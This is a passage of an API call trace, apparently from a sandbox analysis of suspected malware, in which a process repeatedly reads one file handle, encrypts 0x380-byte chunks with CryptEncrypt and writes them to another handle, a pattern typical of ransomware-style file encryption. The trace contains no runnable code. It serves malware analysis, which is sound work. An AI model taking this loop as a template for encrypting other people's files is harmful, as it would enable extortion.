out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.535] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.535] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.535] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.535] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.535] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.536] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.536] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.536] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.536] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.536] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.536] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.536] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.536] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.536] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.536] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.536] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.536] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.536] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.536] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.536] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.537] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.537] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.537] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.537] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.537] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.537] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.537] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.537] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.537] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.537] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.538] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.538] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.538] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.538] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.538] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.538] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.538] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.539] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.539] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.539] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.539] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.539] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.539] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.539] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.539] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.539] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.539] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.539] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.539] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.539] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.539] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.539] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.539] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.539] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.539] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.540] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.540] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.540] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.540] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.540] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.540] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.540] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.540] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.540] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.540] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.540] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.540] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.540] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.540] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.540] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.540] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.541] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.541] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.541] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.541] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.541] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.541] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.541] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.541] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.541] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.541] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.541] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.541] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.541] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.541] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.541] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.542] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.542] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.542] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.542] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.542] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.542] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.542] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.542] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.542] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.542] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.542] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.542] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.542] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.542] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, 